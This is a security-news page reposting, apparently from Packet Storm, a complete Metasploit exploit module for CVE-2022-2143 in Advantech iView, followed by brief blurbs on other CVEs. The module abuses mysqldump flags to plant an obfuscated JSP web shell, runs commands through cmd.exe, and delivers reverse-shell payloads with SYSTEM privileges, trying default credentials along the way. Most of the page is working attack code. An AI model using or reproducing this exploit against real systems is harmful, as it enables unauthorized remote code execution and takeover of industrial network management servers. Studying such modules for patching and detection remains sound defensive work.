Security
Headlines
HeadlinesLatestCVEs

Headline

Advantech iView NetworkServlet Command Injection

Advantech iView software versions prior to 5.7.04.6469 are vulnerable to an unauthenticated command injection vulnerability via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backup_file to the mysqldump command. The sanitization functionality only tests for SQL injection attempts and directory traversal, so leveraging the -r and -w mysqldump flags permits exploitation. The command injection vulnerability is used to write a payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

Packet Storm
#sql#vulnerability#web#windows#apache#js#git#java#rce#ldap#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Advantech iView NetworkServlet Command Injection',        'Description' => %q{          Versions of Advantech iView software below `5.7.04.6469` are          vulnerable to an unauthenticated command injection vulnerability          via the `NetworkServlet` endpoint.          The database backup functionality passes a user-controlled parameter,          `backup_file` to the `mysqldump` command. The sanitization functionality only          tests for SQL injection attempts and directory traversal, so leveraging the          `-r` and `-w` `mysqldump` flags permits exploitation.          The command injection vulnerability is used to write a payload on the target          and achieve remote code execution as NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'y4er', # PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],          [ 'CVE', '2022-2143']        ],        'Platform' => [ 'win' ],        'Privileged' => true,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Windows Dropper',            {              'Arch' => [ ARCH_X86, ARCH_X64 ],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-06-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])      ]    )  end  def check    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('Failed to receive a response from the application') unless res    unless res.body.include?('iView')      return CheckCode::Safe('No confirmation that target is Advantech iView')    end    res = send_db_backup_request('')    return CheckCode::Detected('Failed to receive response from backup request') unless res    # The patch added auth as a requirement for    # accessing the NetworkServlet endpoint    if res.body =~ /ERROR:\s+User\s+Not\sLogin/      @needs_auth = true      print_status('Vulnerability is present, though authentication is required.')    end    CheckCode::Appears  end  def send_db_backup_request(filename)    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),      'keep_cookies' => true,      'vars_post' =>      {        'page_action_type' => 'backupDatabase',        'backup_filename' => filename      }    )  end  def format_jsp    bin_nums = []    arg_nums = []    flag_nums = []    bin_param.each_char { |c| bin_nums << c.ord }    bin_nums = bin_nums.join(',')    arg_param.each_char { |c| arg_nums << c.ord }    arg_nums = arg_nums.join(',')    flag_param.each_char { |c| flag_nums << c.ord }    flag_nums = flag_nums.join(',')    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \    'new ProcessBuilder(request.getParameter(' \    "new java.lang.String(new byte[]{#{bin_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \    '.getInputStream()))%>'  end  def flag_param    @flag_param ||= Rex::Text.rand_text_alpha(3..8)  end  def arg_param    @arg_param ||= Rex::Text.rand_text_alpha(3..8)  end  def bin_param    @bin_param ||= Rex::Text.rand_text_alpha(3..8)  end  def jsp_filename    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename),      'keep_cookies' => true,      'vars_get' =>      {        bin_param => 'cmd.exe',        flag_param => '/c',        arg_param => cmd      }    )  end  def iview_authenticate    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')    vprint_good('Successfully accessed the login page')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),      'keep_cookies' => true,      'vars_post' => {        'page_action_service' => 'UserServlet',        'page_action_type' => 'login',        'user_name' => datastore['USERNAME'],        'user_password' => datastore['PASSWORD'],        'use_ldap' => 'false',        'data' => ''      }    )    unless res && res.body.include?('Success')      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')    end    vprint_good('Authentication successful!')  end  def need_auth?    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')    )    return false unless res    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)  end  def exploit    if @needs_auth || need_auth?      iview_authenticate    end    jsp_code = format_jsp    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""    res = send_db_backup_request(full_cmd)    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res    path = "webapps\\iView3\\#{jsp_filename}"    register_file_for_cleanup(path)    if target['Type'] == :win_dropper      execute_cmdstager    else      execute_command(payload.encoded)    end  endend

Related news

CVE-2022-38108: Published | Zero Day Initiative

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

CVE-2022-36957: Published | Zero Day Initiative

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

CVE-2022-2143

The affected product is vulnerable to two instances of command injection, which may allow an attacker to remotely execute arbitrary code.

Packet Storm: Latest News

Zeek 6.0.9